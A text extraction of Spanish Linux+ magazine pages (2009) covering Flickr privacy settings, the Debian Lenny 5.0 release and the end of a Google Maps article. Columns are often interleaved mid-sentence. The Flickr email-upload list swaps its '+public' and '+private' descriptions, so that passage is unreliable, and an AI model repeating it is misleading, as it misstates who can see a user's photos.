en www.losmundosdeyaiza.com
dad con que están pensadas las clases y su
flexibilidad, hacen que poco tiempo después
de haber empezado a crear nuestros propios
mapas podamos deducir fácilmente cómo se
va a programar algo sin apenas mirar la do-
cumentación.
Con este artículo se ha pretendido dar una
visión general sobre las necesidades más fre-
cuentes que puede encontrarse un programa-
dor a la hora de crear uno de estos mapas,
aunque existen muchísimas más posibilida-
des, desde superponer otros mapas sobre los
ya creados, colorear regiones del mapa o, in-
cluso, que al calcular una ruta entre dos pun-
tos aparezca un icono de un coche recorriendo
la ruta para que podamos irla siguiendo. Las
posiblidades son enormes, máxime cuando
Google no se ha quedado de brazos cruzados
y cada pocos meses nos enteramos de nuevos
servicios que van apareciendo, como el recien-
te Google Mars (con mapas de la superficie de
Marte) o Google Street (que permite que visi-
temos las calles desde el punto de vista de un
peatón). Las posibilidades a día de hoy ya son
enormes, pero seguro que el tiempo nos ofre-
ce aún más posibilidades de diversión con los
nuevos servicios con los que, seguro, Google
seguirá sorprediéndonos.
21
 gráfica y diseño web
Cuida de tu privacidad en Flickr
Privacidad en Flickr
José María Gómez Hidalgo
Las redes sociales han convertido a la Web en un entorno realmente
interactivo y social para todos sus usuarios. Hoy en día, cualquiera puede
crear contenidos en la Web, y compartirlos con todos sus conocidos.
L
as redes sociales de fotos como Flickr y Picasa
linux@software.com.pl
son un exponente máximo de esta tendencia, sus
usuarios se cuentan por decenas de millones,
y albergan centenares de millones de fotografías
de lo más variopinto. Pero si uno sube sus fotos a la Web,
¿quién puede acceder a ellas? ¿Cómo controlarlo?
El futuro de la edición digital ha llegado. A diferencia de
los programas tradicionales de edición fotográfica, que se
centran en los aspectos técnicos de corrección y perfeccio-
namiento de las fotografías, existen cada vez más programas
y portales que enfatizan su vertiente social: compartir, ver
y comentar fotografías propias y ajenas. Los portales más
populares en este sentido son Flickr, propiedad actual de
Yahoo!, y Picasa, de Google. En ellos residen innumerables
fotografías de usuarios de la Web de todo el mundo.
Pero si lo que importa es compartir, ¿no importará tam-
bién con quién? Si se utilizan las opciones de privacidad por
defecto de Flickr o de Picasa, que promueven lo público,
las fotos estarán a disposición de cualquiera, que las puede
consultar o usar para los fines que prefiera. ¿Te arriesgas
a que una foto de tu novia o de tu hijo aparezca en el lugar
más inesperado?
22 Linux+ 4/2009
En este artículo examinaremos con detalle las opciones de
privacidad de Flickr, dejando para más adelante las de Picasa.
Nuestro objetivo es que hagas uso de las herramientas de priva-
cidad que se te ofrecen en este portal, para que puedas controlar
de manera efectiva quién accede a tus imágenes, y cómo lo hace.
Empezando en Flickr
Flickr permite esencialmente subir y compartir fotografías. Ac-
tualmente no dispone de herramientas de edición, a diferencia
de Picasa y otros portales. Sin embargo, es con diferencia el
sistema de difusión de fotografías más popular del mundo.
No es el objetivo de este artículo dar una guía detallada
de uso de Flickr, pero no está de más sentar algunos conceptos
básicos. Para empezar, necesitamos una cuenta en Flickr. Si
tienes una cuenta en Yahoo!, es casi inmediato crear un usuario
con las credenciales de que ya dispones. Si no es así, nuestro
consejo es crear una cuenta en Yahoo!, pues tiene numerosos
servicios que pueden ser de utilidad.
Tu perfil
Lo primero a controlar es el contenido y la visibilidad del
perfil del usuario que uno crea. Una manera extremadamente

Figura 1. Al agregar un contacto, podemos marcarlo como amigo o familiar
sencilla de hacerlo es rellenándolo con datos
imprecisos, o directamente falsos. Pero eso no
nos permite compartir mucha información con
nuestros amigos o familiares, y si lo hacemos,
seremos igualmente visibles de una forma u otra.
Por ello, es mejor poner la verdad, aunque es re-
comendable reservarse los detalles más privados;
se debe asumir que en último caso, todo lo que
se ponga en Internet es accesible para cualquiera
que tenga suficiente tiempo e interés.
El control de la información visible en el
perfil del usuario de Flickr se realiza a través de
las opciones de Tu cuenta. Dentro del apartado
de Privacidad y permisos, existen una serie de
opciones que permiten controlar la privacidad
de los datos de usuario, las opciones por defecto
de las fotos, y las opciones de filtro de conteni-
dos. Las opciones de los datos de usuario están
en Configuración global, y son las siguientes:
• Quiénes pueden descargar tus cosas: Para
descargas al equipo de otros usuarios o vi-
sitantes.
• Quiénes pueden compartir tus fotos o videos:
Para usar y difundir tus fotos en páginas
de terceros.
• Quiénes pueden imprimir tus fotos: Para im-
primir tus fotografías desde el propio Flickr.
• Quiénes pueden publicar tus cosas en un
blog: Permite o no a otros usar tus conte-
nidos en sus blogs de Flickr.
• Ocultar tus datos EXIF: Permite ocultar
los metadatos que las máquinas fotográfi-
cas agregan a las fotografías.
• Ocultar tus cosas de las búsquedas públi-
cas: Para mostrar u ocultar tus fotos en las
búsquedas que realizan otros usuarios
• Ocultar tu perfil de las búsquedas públi-
cas: Tu perfil no aparecerá en las búsque-
das que realicen otros usuarios.
• Quién tiene permiso para ver tu dirección
de correo electrónico, tus nombres de
mensajería instantánea (como el Yahoo!
Messenger), tu nombre real o tu ciudad
actual.
Las respuestas a las preguntas quién se hacen Operaciones y modos de uso
en términos del concepto de contacto, que ex- Las operaciones más importantes que permite
plicamos a continuación. Flickr son las siguientes:
Tipos de contactos y visibilidad
Un contacto es cualquier usuario de Flickr que
agregamos como tal, o al que invitamos a unir-
se a Flickr y acepta la invitación. Una manera
sencilla de encontrar contactos ya presentes en
el sistema es usando la búsqueda en el menú
Contactos. También se puede invitar a conoci-
dos usando el menú Invitar a tus amigos.
Una vez localizada una persona de nuestro
interés, podemos agregarla a nuestros contactos
pulsando sobre el menú desplegable que apa-
rece junto a su foto o icono, y eligiendo dicha
opción. Se nos presenta la opción de marcarlo
como Amigo o Familiar, como se puede ver en
la Figura 1.
Figura 2. Las tres áreas de trabajo de Organizr
www.lpmagazine.org
gráfica y diseño web
Cuida de tu privacidad en Flickr
Por lo general, las opciones de visibilidad
de un contenido en Flickr, incluyendo los datos
del perfil de usuario, están entre las siguientes:
• Privado: El contenido sólo es visible para
nosotros.
• Visible para familiares: Nadie más que
ellos podrá ver el contenido.
• Visible para amigos: Igualmente para los
contactos marcados como amigos.
• Visible para familiares y amigos: Incluye a
ambos grupos.
• Visible para tus contactos: El contenido es
visible para todos los contactos, incluyen-
do aquellos que no están marcados como
familiares o amigos.
• Público: El contenido es visible para todos
los usuarios, incluyendo los que están fue-
ra de Flickr.
No todos los contenidos tienen todos estos
niveles de acceso, y además, no hay un criterio
fijo sobre qué niveles deben estar disponibles
en cada ocasión.
• Subir y administrar fotografías.
• Crear y gestionar álbumes de fotos. Los
álbumes son colecciones de fotos relaciona-
das entre si a gusto del usuario.
• Unirse a grupos de usuarios y administrar-
los. Los grupos de usuarios permiten com-
partir imágenes entre personas afines, aun-
que no sean contactos entre si.
• Geoposicionar imágenes. Esta funcionali-
dad permite asociar posiciones geográficas
a las fotografías, como el lugar en que se
tomaron.
La mayoría de estas operaciones pueden reali-
zarse a través de varias interfaces:
23
 gráfica y diseño web
Cuida de tu privacidad en Flickr

• Organizr: Es la herramienta Web para ad-

ministrar fotografías.
• Flickr Uploader: Es un programa indepen-
diente para Windows y Mac que se descar-
ga e instala en el ordenador del usuario,
y facilita algunas de estas funciones.
• Correo electrónico: Es posible realizar
algunas funciones a través de cuentas es-
peciales de correo electrónico.

Vamos a examinar las opciones de privacidad

relativas a todas estas herramientas.

Manejando
la privacidad con Organizr
De las herramientas anteriores, el sistema Orga-
nizr es el más potente y flexible, pero necesita
de conexión a Internet permanente, y un ancho
de banda razonable.
En la Figura 2 se muestra una visión gene-
ral de la interfaz de Organizr, con sus tres áreas
principales de trabajo:

• En la parte superior aparecen los menús

generales en forma de pestañas, junto con
submenús que dependen de la pestaña ac-
tiva.
• En la parte central se muestra el lote actual
Figura 4. Las opciones de permisos de edición disponibles para un elemento seleccionado en Organizr
de fotos, al que se le van a aplicar los cam-
bios y operaciones que el usuario desee. opciones para subir fotos, que incluyen en par- familiares y/o amigos. En la Figura 4 se mues-
• En la parte inferior aparecen todos los con- ticular una serie de opciones de privacidad. tran todas las opciones, que aparecen cuando
tenidos de que dispone el usuario. Una vez se seleccionan las imágenes se pulsa sobre el enlace Mostrar opciones de
a subir en el área superior, se puede acceder carga adicionales, y que incluyen también las
Obviamente, para poder empezar a trabajar con a las opciones privacidad y tipo de contenido en opciones de filtrado, de tipo de contenido, y de
fotografías, hace falta haber subido unas cuan- el área inferior. Las opciones disponibles en un visibilidad para las búsquedas.
tas. La manera más simple para subir fotogra- primer momento son las que afectan sólo a la Las opciones que afectan a los contactos
fías no es desde el propio Organizr, sino desde visibilidad en términos de contactos: si la foto son bastante evidentes. Sin embargo, hay que
Flickr Uploader. En la Figura 3 se muestran las es privada, pública o accesible solamente a los tener presente que el que una fotografía sea
visible para un contacto le permite por defecto
incluirla entre sus favoritas, a no ser que en las
opciones de la Configuración global se haya
establecido lo contrario en el apartado Quiénes
pueden compartir tus fotos o videos, lo que sig-
nifica que será visible para terceros a través de
los favoritos de tu contacto.

Las opciones de edición

Flickr, a través de su herramienta Organizr, ad-
mite ciertos niveles básicos de edición a saber:
agregar, modificar o eliminar títulos, etiquetas
y descripciones, y rotar las fotografías. La he-
rramienta Picasa de Google posibilita niveles
de edición más avanzados, aunque no permite
llegar al nivel de un editor profesional.
Las opciones relativas a los títulos, etique-
tas y descripciones pueden estar disponibles
para los contactos de un usuario. O dicho de
otra forma, se puede permitir que terceros
Figura 3. Al subir fotos con Uploader, es posible establecer algunas opciones de privacidad modifiquen algunos de los metadatos asociados

24 Linux+ 4/2009
 gráfica y diseño web
Cuida de tu privacidad en Flickr

a una búsqueda. Para establecer estas opciones,

dado un lote de fotografías, basta seleccionar la
opción Editar dentro del menú Permisos. En la
Figura 4 se muestran las opciones de privaci-
dad, que incluyen:

• Quién puede ver los elementos del lote,

• Quien puede agregar comentarios,
• Quién puede añadir notas y etiquetas.

Todos los permisos se establecen en términos

de los tipos de contactos disponibles, estando
graduados en este caso en una escala de cua-
tro: privado, amigos y familiares, contactos,
y público. Se pueden establecer las opciones
predeterminadas para nuevas cargas en Tu
cuenta, en la pestaña Privacidad y permisos,
dentro del área Opciones predeterminadas
para las cargas nuevas, en las opciones
Quiénes podrán ver, comentar o agregar
notas.

Figura 6. En Organizr es posible establecer distintas licencias para un lote de objetos

Los filtros
y el nivel de seguridad Tipo de contenido que subamos un contenido, debemos preguntar-
Flickr es una comunidad global constituida por Se contemplan tres tipos de contenidos: nos: ¿esta imagen le molestaría a alguien? Y en
distintos tipos de personas. Lo que es correcto caso de respuesta afirmativa, usar los niveles de
en tu país o región, puede no serlo en el de los • Fotos y vídeos, seguridad Moderado o Restringido.
demás. Cada usuario tiene la responsabilidad de • Ilustración, arte, animación o imagen ge- Las normas de la comunidad prohíben
clasificar o categorizar su propio contenido den- nerada por computadora, u otras imágenes específicamente los siguientes comportamien-
tro de la comunidad. Por eso, se han introducido no fotográficas, tos:
los dos filtros presentados a continuación. • Grabaciones de pantalla y capturas de pan-
talla. • Cargar cosas que no son tuyas.
Nivel de seguridad • Despreocuparse de la moderación, y en
Hay tres niveles de seguridad: Es importante categorizar adecuadamente cada especial, de los niños.
contenido dentro de estas categorías de seguridad • Mostrar desnudez en tu icono.
• Seguro: Contenido adecuado para una au- y tipo, porque se pueden utilizar para restringir • Atacar a otros miembros y ser maleducado.
diencia pública global. las búsquedas, y lograr de esa manera una mayor • Usar tu cuenta para alojar gráficos Web
• Moderado: Si no estás seguro de si tu conte- precisión. Es especialmente importante respetar como logotipos y pancartas.
nido es adecuado para una audiencia pública los niveles de seguridad, ya que de no hacerlo, • Usar Flickr para fines comerciales.
global, pero consideras que no debe ser res- podemos ver nuestra cuenta de usuario modera-
tringido en sí, esta categoría es la adecuada. da, es decir, supervisada por el personal de Flickr, En la Figura 5 se muestran las opciones de filtro
• Restringido: Éste es un contenido que y en el peor de los casos, si no nos sometemos de seguridad para un contenido, accesibles en
definitivamente no debería estar al alcance a las normas de la comunidad, podemos ser ex- el menú Permisos, en la opción Filtro de segu-
de los niños. pulsados del sistema. En otras palabras, cada vez ridad. Estas opciones se aplican a las fotos que
se encuentran en el lote actual de trabajo de la
herramienta Organizr, pero es posible establecer
opciones predeterminadas para la cuenta, es de-
cir, las opciones por defecto. Para ello, en el menú
Tu cuenta, en la pestaña Privacidad y permisos,
se deben editar las Opciones predeterminadas
para cargas nuevas, que permiten definir el nivel
de seguridad y tipo de contenido que tendrá tu
galería.
En este mismo área es posible definir las
opciones por defecto para las búsquedas, que se
pueden restringir de acuerdo a los dos parámetros
anteriores. El tipo de contenido por defecto en las
búsquedas, si no se edita, es Fotos y vídeos. Tam-
Figura 5. Las opciones de filtro de seguridad disponibles para un elemento seleccionado en Organizr bién por defecto, la búsqueda es segura, es decir,

www.lpmagazine.org 25
 gráfica y diseño web
Cuida de tu privacidad en Flickr

tiene la opción SafeSearch activada. La opción quetas. La foto no se muestra a las personas que • El personal de Flickr no interviene si un
SafeSearch se rige por lo siguientes parámetros: no son miembros del grupo. administrador abusa de sus privilegios en
Las fotos también pueden agregarse a de- un grupo.
• Si un usuario no está registrado en Flickr, bates y discusiones. Los administradores del
SafeSearch siempre está activado. grupo pueden elegir mostrar u ocultar el mural Antes de hacer a alguien administrador de un
• Si un usuario está registrado y es menor de fotos del grupo y los temas de debate en grupo tuyo, piénsatelo mucho.
de 18 años, puede elegir tener SafeSearch cualquier momento.
activado o moderado. Hay dos tipos de grupos: Licencias de uso
• Si un usuario está registrado y es mayor de Un modo para controlar el uso que alguien
18 años, puede optar entre tener SafeSear- • Los grupos públicos, que figuran en la pá- puede hacer de tus fotos es usar el sistema de
ch activado, desactivado o moderado. gina de los grupos, perfiles y páginas de licencias. Flickr trabaja con el sistema de licen-
fotos si la foto está en un mural de grupo. cias de Creative Commons, que es similar a las
Cuando un usuario está buscando en Flickr Hay dos tipos de grupos públicos: cual- licencias del software libre, pero más orientado
y no está identificado con su usuario, el sistema quiera puede unirse y sólo invitación. a obras artísticas: libros, música, imágenes,
ofrece las opciones para usuarios no registra- • Los grupos privados, que no figuran en etc. Se trata de un sistema que establece varios
dos, por lo que SafeSearch está activado. ningún lugar del sitio de Flickr. Es posible aspectos de uso:
Una advertencia: mucho cuidado con no unirse a ellos sólo con una invitación.
moderar tus contenidos. No solo los editores de • Atribución: Se debe atribuir la obra a su
Flickr los pueden revisar ocasionalmente, sino El control de un grupo está a cargo de los admi- autor original.
que otros usuarios pueden reportar a dichos nistradores del mismo. Un administrador puede • Uso comercial o no comercial de la ima-
editores la existencia de contenidos mal clasi- controlar la información del grupo (nombre, gen.
ficados, lo que puede llevarte a una cancelación descripción, etc.), las opciones de moderación • Derivación de obras nuevas a partir de una
de tu cuenta. (seguridad de filtros y tipos de contenido), obra, o de otro modo, si es posible, generar
y crear reglas de participación. También pue- nuevos trabajos a partir del tuyo.
Los mapas y los grupos de controlar el acceso al contenido y de los • Compartir: En caso de que se comparta, se
Una de las herramientas más usadas por los propios usuarios, incluyendo en particular: pueden forzar una licencia determinada.
usuarios es el geoposicionamiento de las aprobar o eliminar fotos del mural, moderar
fotografías. Lo más frecuente es que los usua- las discusiones del grupo, o eliminar o prohi- En la herramienta Organizr, es posible esta-
rios sitúen en el mapa del mundo el lugar en bir a miembros. blecer una licencia para un lote de objetos,
el que fue tomada la fotografía, y como los Si un usuario crea un grupo, debe tener como se muestra en la Figura 6. La licencia
mapas son bastante precisos, es perfectamente presentes varias cosas: por defecto es Ninguno, es decir, Todos los
factible situar una imagen al pie de la propia derechos reservados. Ello previene que nadie
Torre Eiffel. • Un grupo no se puede eliminar mientras pueda utilizar una fotografía de un usuario, ni
La primera vez que se accede al mapa haya miembros en él. modificarla y publicarla para sus propios fines,
propio con la herramienta Organizr, el sistema • Una vez que uno es administrador de un ya sean comerciales o privados. Se puede esta-
solicita las opciones de acceso al mapa, es de- grupo, no se le puede bajar de categoría, ni blecer la licencia predeterminada para nuevas
cir, quien puede ver tu mapa o la posición geo- eliminar del grupo. cargas en Tu cuenta, en la pestaña Privacidad y
gráfica de tus fotos. Las opciones son las ha-
bituales en los contactos. También es posible
establecer las opciones predeterminadas para
las nuevas cargas de imágenes en Tu cuenta,
en la pestaña Privacidad y permisos, dentro
del área Opciones predeterminadas para las
cargas nuevas, en Quiénes podrán ver tus co-
sas en un mapa.
Los grupos establecen un nuevo nivel de
privacidad a nivel de acceso. Los grupos sirven
para compartir contenidos con usuarios con
intereses similares, y participar en discusiones
y debates. Cada grupo dispone de un mural
en el que sus miembros publican las fotos que
desean. Para compartir una foto con un grupo,
basta seleccionarla y, en el menú contextual que
aparece, pulsar sobre Enviar a grupo, y sele-
ccionar uno en el que figures. Si compartes una
foto que marcaste como privada con un grupo
del que eres miembro, es como si los otros
miembros del grupo tuvieran acceso total a esa
foto. Pueden agregar comentarios, notas y eti- Figura 7. En la interfaz de Flickr Uploadr se observa que las opciones de uso son muy limitadas

26 Linux+ 4/2009
 gráfica y diseño web
Cuida de tu privacidad en Flickr

trándolas desde una carpeta de Windows ponen en el cuerpo, en una línea indepen-
Sobre el autor o Mac. diente.
• El área derecha, que establece las opciones
José María Gómez Hidalgo es Doctor en que se aplican a las fotos del área izquier- Para controlar la visibilidad de las fotos, se pue-
Ciencias Matemáticas, ha sido profesor da, y que permite además crear álbumes den anexar algunas claves especiales al nombre
y Director de Sistemas Informáticos en y subir las fotos con el botón Subir fotos de usuario de la dirección para subir fotos, co-
la Universidad Europea de Madrid, y ac- de la parte inferior. En el área derecha es mo las siguientes:
tualmente trabaja en la seguridad de donde se pueden establecer las opciones
contenidos en Optenet. Ha dirigido varios de carga de las fotos, que en términos de • blabla45bla+friends@photos.flickr.com:
proyectos de investigación centrados en visibilidad y privacidad, incluyen que El objeto sólo será visible para los contac-
distintos aspectos de la seguridad infor- usuarios podrán ver las fotografías, el tos marcados como amigos.
mática. Su especialidad es la aplicación nivel de seguridad de las mismas (filtro • blabla45bla+family@photos.flickr.com: El
de técnicas de Inteligencia Artificial a la de seguridad), y si estarán disponibles en objeto sólo será visible para los contactos
seguridad de contenidos, y ha publicado las búsquedas. marcados como familiares.
varios artículos científicos, e impartido • blabla45bla+ff@photos.flickr.com: El ob-
conferencias nacionales e internaciona- Todas estas opciones son idénticas a las de la jeto sólo será visible para amigos y fami-
les sobre el correo basura y el filtrado carga de objetos a través de la web. liares.
Web. Su página web es http://www.esp. • blabla45bla+public@photos.flickr.com: El
uem.es/jmgomez, y su correo electrónico Subiendo objeto sólo será visible para el usuario.
es jmgomezh@yahoo.es fotos por correo • blabla45bla+private@photos.flickr.com:
electrónico El objeto sólo será visible para todos.
permisos, dentro del área Opciones predetermi- También es posible subir fotos por correo elec-
nadas para las cargas nuevas, en Qué licencia trónico. Flickr proporciona con este fin una De esta manera es posible anular las preferen-
tendrá tu contenido. cuenta única de correo a cada usuario, de la cias por defecto, para algunos temas de privaci-
forma blabla45bla@photos.flickr.com. Cuan- dad (aunque no todos, como la búsqueda o los
Un vistazo a Flickr Uploadr do un usuario incluye una foto en un mensaje filtros de seguridad).
Flickr Uploadr es una herramienta ligera y li- y lo envía a su cuenta personal, esta foto sube
mitada que permite hacer algunas tareas bá- a su galería de Flickr. Es preciso tener en Para finalizar
sicas, como rotar las fotos, y que en general cuenta varias cosas: Usar Flickr para compartir fotos con tus cono-
está orientada a subir contenidos a la web de cidos, ponerlas en un blog, etc. es una auténti-
Flickr. Para poder usar esta herramienta, hay • En primer lugar, puede haber un retraso ca delicia. Sin embargo, Flickr no deja de ser
que descargarla de Flickr, y una vez instalada, importante en el tiempo en que las fotos un portal online, por lo que conviene cuidar
configurar la cuenta para que permita subir aparecen en la galería, que puede ir desde los aspectos de privacidad, tanto los propios
fotos desde ella. Esto es muy sencillo, ya que unos minutos a varias horas. Lo normal como los de los objetos que subimos. Hay que
el propio programa abre la página de confi- es que sean unos minutos. preocuparse de quien puede ver y compartir-
guración donde se establece esta opción. La • En segundo lugar, las opciones que se los, quién puede agregar etiquetas o notas a los
herramienta está concebida para su uso online, aplican por defecto a las fotos son las op- mismos, qué licencia tienen de cara a su posible
por lo que las operaciones que se pueden rea- ciones predeterminadas, a no ser que se reutilización, qué nivel de seguridad tienen,
lizar cuando uno está desconectado son muy utilicen características adicionales en el y de si un desconocido puede encontrarlos
limitadas. correo. o no con una simple búsqueda en Flickr. En
En la Figura 7 se muestra la interfaz de • En tercer lugar, conviene mantener esta último caso, si quieres que algo sea totalmente
Flickr Uploadr, que se encuentra dividida en cuenta como privada y desconocida para privado, ni se te ocurra ponerlo en Internet
cuatro partes principales: los demás, por razones obvias. o enviarlo por correo electrónico. O si quieres
hacerlo pese a todo, utiliza técnicas de cifrado.
• La barra de menús en la parte superior. In- Es posible agregar título, etiquetas y descrip- Pero eso es tema para otro artículo...
cluye tres menús, y el único que tiene inte- ciones a las fotos que se suben. Para ello, la
rés es el primero, Subir fotos. Se incluye la estructura del mensaje que se sube es muy
opción de Agregar para incorporar fotos al importante:
En la red
grupo actual, la de Subir fotos, la de Pre-
ferencias, y Salir. Las preferencias sólo se • El asunto o Subject se utiliza como título • (Web) Uploader:
pueden cambiar estando conectado. de la foto. http://www.flickr.com/photos/upload/
• Una barra de menús superior muy simple, • El cuerpo o Body se utiliza como descrip- • Flickr Organizr:
que permite agregar fotos o eliminarlas del ción de la foto. http://www.flickr.com/photos/organize/
lote actual, y rotarlas a derecha o izquierda. • Las etiquetas se pueden poner en el asun- • Flickr Uploadr:
• El área izquierda, que incluye información to o en el cuerpo, precedidas de la palabra http://www.flickr.com/tools/
de si se está conectado o no (Uploadr se co- etiquetas:, separadas por espacios, y den- • Picasa: http://www.picasa.com/
necta automáticamente a Flickr si uno tiene tro de comillas si una etiqueta tiene varias • Creative Commons:
conexión a Internet), y las fotos actuales. palabras (lugares bonitos). Si se ponen en http://www.creativecommons.org/
Se puede agregar fotos al lote actual arras- el asunto, se deben poner al final, y si se

www.lpmagazine.org 27
 software
Debian Lenny 5.0

Debian Lenny 5.0:

La última versión estable
del sistema operativo libre
Leonel Iván Saafigueroa
Gracias a veintidós meses de desarrollo constante, y luego de
postergar la fecha de lanzamiento varias veces, apareció una
nueva versión estable del sistema operativo libre por excelencia.

I
an Murdock, un científico de la computación, escri- dependencias de forma automática. Actualmente Ian Murdock
linux@software.com.pl

bió el manifiesto Debian en 1993 mientras estudiaba
en la Purdue University, donde obtuvo su diplomatu-
ra. En este manifiesto aparecía la idea de desarrollar
una distribución no comercial que sea capaz de competir
efectivamente en el mercado comercial. Así fue que esta
nueva distribución tomó el nombre de Debian (viene de
los nombres de su creador: Ian Murdock, y de su esposa,
Debra).
Debian, en vez de estar desarrollada por un individuo
o un grupo como se han desarrollado otras distribuciones,
fue desarrollada abiertamente en el espíritu de Linux y GNU
a través de Internet, con el propósito de conseguir una distri-
bución que esté a la altura de cualquier otro sistema comer-
cial, logrando un sistema operativo GNU basado en software
libre precompilado y empaquetado en un formato sencillo
para múltiples arquitecturas y en varios núcleos.
Su sistema de paquetes Advanced Packaging Tool (APT),
simplificó en gran medida la instalación y eliminación de pro-
gramas en los sistemas GNU/Linux, administrando de forma
eficiente los paquetes .deb, y encargándose eficazmente de
instalar no solo los programas solicitados sino también sus
ya no es el líder del proyecto pero sigue de cerca el desarrollo
de esta distribución basada en su manifiesto.
El proyecto Debian
Debian es el esfuerzo de un grupo de voluntarios alrededor
del mundo, con el objetivo de producir una distribución
de Linux, pero compuesta únicamente por software libre.
Podemos descargar Debian de Internet con la seguridad de
poder usarla, copiarla, estudiarla, modificarla y redistribuir-
la libremente.
Tres ramas del desarrollo de Debian
El desarrollo de Debian se divide en tres ramas.
Versión inestable
También conocida como unstable o con su nombre en clave
SID, es en esta rama en donde se prueban los nuevos paque-
tes, donde tiene lugar el desarrollo activo de Debian, y es la
rama que usan los desarrolladores del proyecto. Los paquetes
en su mayoría corresponden a las últimas versiones, pero es
posible que estos no estén libres de errores.

28 Linux+ 4/2009

Figura 1. Logo del sistema operativo Debian
Testing
Luego de que los paquetes son probados duran-
te un tiempo prudencial en la rama inestable,
pasan a integrarse a la rama de prueba. Pues ya
contienen muchos menos errores, estos paque-
tes ya deben de poder instalarse en todas las ar-
quitecturas para las cuales fueron construidos.
La rama de prueba sufre distintas modifi-
caciones hasta que deciden congelarla; a partir
de ese momento se detiene la incorporación de
nuevos paquetes. Luego se trabaja de forma
intensiva para pulir el mayor número de fallos
posibles, luego dependiendo del registro de fa-
llos, se libera como versión estable, y la que era
se predecesora se archiva.
Debian Lenny fue la rama testing o de prue-
bas durante 22 meses, en diciembre del año 2008
ya estaba congelada. Finalmente, el sábado,
14 de febrero de 2009 fue declarada estable.
Su predecesora llamada Etch fue archivada
e inmediatamente se dio comienzo a una nueva
rama testing llamada squeeze.
Versión estable
Una versión estable o stable es la versión estabi-
lizada de Debian, no se pueden hacer modifica-
ciones en esta rama, solo el equipo de seguridad
de Debian publica parches de seguridad para
los paquetes de esta rama. Son paquetes muy
probados, muy estables, pero no tan actuales por
todo el tiempo que requiere su adecuado testeo
y adaptación al sistema.
¿Debian es mejor que Ubuntu?
Ninguno es mejor que otro, son distintos y están
orientados a distintos tipos de usuarios, a su vez
Ubuntu está basado en Debian y su objetivo
Figura 2. Pantalla de booteo de Gnu-Debian
software
Debian Lenny 5.0
es facilitar y llegar fácil al usuario. Debian es
más simple, liviana, pero requiere una mayor Toy Story y Debian
intervención por parte del usuario para resolver
ciertos aspectos de la configuración. Las diferentes versiones de las distribucio-
Mientras que Ubuntu intentará tener las nes de Debian llevan cada una el nombre
últimas versiones de los distintos programas en en clave de un personaje de Toy Story. Así,
sus paquetes, Debian nos traerá en su rama es- la versión 3.0 se llamó Woody (el vaquero
table versiones más antiguas, aunque más pro- y protagonista del film), siguiendo hasta la
badas y con mayor estabilidad. |Estos paquetes última (2009) llamada Lenny (Los binocu-
no están propensos a tener errores, cosa que en lares), mientras que la versión inestable
Ubuntu no hay tantas garantías. o en desarrollo se llamara siempre Sid (el
Igualmente, luego de instalar la versión es- chico malo de la película).
table es posible pasarse a la versión inestable
(SID), que poco tiene que envidiarle a una Ubun- escritorio predeterminado es GNOME y se dis-
tu, aun así muchos paquetes de SID son más tribuye en el primer CD, aunque también puede
antiguos que los de la estable de Ubuntu, pero ser descargado un primer CD alternativo, el cual
vamos... que no siempre lo último es mejor. contiene como predeterminado al escritorio
XFCE4. Otros escritorios como KDE también
Novedades en Debian Lenny 5.0 están disponibles. Además, la instalación incluye
Esta nueva versión incorpora como novedad: soporte para la creación de particiones cifradas.
Algo que se destaca en esta versión son los pri-
• Kernel 2.6.26, meros Live-CD oficiales del proyecto.
• GNOME 2.22,
• X.org 7.3, Instalador gráfico
• LXDE (Lightweight X11 Desktop Envi- Ésta fue una de las grandes novedades en la ver-
ronment), sión anterior y podemos acceder al nuevo insta-
• OpenOffice.org 2.4 con soporte para .docx,
lador gráfico escribiendo en la pantalla de boo-
• Iceweasel/Firefox 3, teo tanto de CDs como DVDs de Debian. La
• MySQL 5.1, instalación ahora es bastante intuitiva y ya no hay
• Nagios3, excusas para decir que ésta es una distribución de
• Nuevo tema MoreBlue Orbit. difícil instalación.
El instalador nos permite elegir entre un total
También hay incorporaciones nuevas en mate- de 58 idiomas gracias a esta nueva interfaz gráfi-
ria de virtualización. Incluyen: ca que soporta tanto grafías que utilizan caracte-
res compuestos como lenguas complejas.
• Xen 3.2.1, La nueva versión del instalador nos trae:
• KVM,
• virt-manager, • Actualización del núcleo Linux (2.6.26-13)
• libvirt, y los módulos externos (2.6.26-5),
• los frontends qtemu, • Módulos disponibles para dispositivos
• qemulator para Qemu. PATA en imágenes CD-ROM (corrige par-
cialmente los problemas de instalación con
Deja de tener soporte para: controladores de disco Marvell, persisten al-
gunos problemas y están documentados en
• Kernel 2.4, la errata),
• Arquitectura Sparc32, • Mejora en el soporte de dispositivos de brltty,
• Apache 1.x (reemplazado por Apache2), • Soporte para carga de firmware desde dis-
• XMMS 1.x (reemplazado por XMMS2). positivos usb en Sparc,
Algunos firmwares ya no están en el reposito-
rio principal, pero sí en non-free. FlashPlayer De algo hay que vivir
disponible sólo como backport (pero swfdec-
Ian Murdock no solo fue el fundador del
mozilla instalado por defecto).
proyecto Debian, también creó la distribu-
ción comercial Progeny Debian, basada en
Instalación
Debian. Pero al tiempo tuvo serios proble-
La instalación de Debian GNU/Linux, al igual
mas financieros y termino fusionándose al
que la versión anterior, es más fácil, permitien-
proyecto Debian, dedicándose finalmente
do hacerlo desde DVD, CD, memorias USB,
al desarrollo de servicios.
disquetes, o utilizando una red. El entorno de
www.lpmagazine.org 29
 software
Debian Lenny 5.0
Figura 3. Debian GNU/Linux está traducido a muchos idiomas
• Mejora del soporte para particiones encrip-
tadas en el modo rescate,
• Corregido el instalador s390 en 3215 con-
solas,
• Corregidos problemas de la consola de
serie en Sparc,
• Corregido el CD multi-arquitectura: ya no
arrancará directamente al instalador amd64,
• Guía de instalación actualizada con la adi-
ción de nuevo de la traducción al español,
• Corrección de la traducción al danés en
algunos módulos escasamente usados,
• Corrección de cálculos de tamaño de parti-
ciones en particionamiento LVM automá-
tico.
Figura 4. Entorno gráfico GNOME de Debian Etch
30
Ahora los usuarios pueden volver al menú de
arranque desde las pantallas de ayuda del arran-
que, el directorio tools/ ya no estará en la
imágenes de CD, este solía incluir herramientas
como loadlin, unzip, gzip que próximamente
no se usarán ni documentarán en la guía de
instalación.
Conclusión
Debian GNU/Linux es una distribución apro-
piada cuando se necesita la máxima eficiencia
y flexibilidad en una distribución Linux, no es
sólo la distribución GNU/Linux más grande
en la actualidad, también es una de las más
estables.
Linux+ 4/2009
Sobre el autor
Es analista de Sistemas, docente, radioafi-
cionado (LU5ENP), consultor en informáti-
ca y conductor del programa de radio libre
hispano – Red-Handed Radio (www.red-
handed.com.ar). Si quieres hacerle algún
comentario, escribe a: Leonel@saafiguer
oa.com.ar
En esta nueva versión encontramos pa-
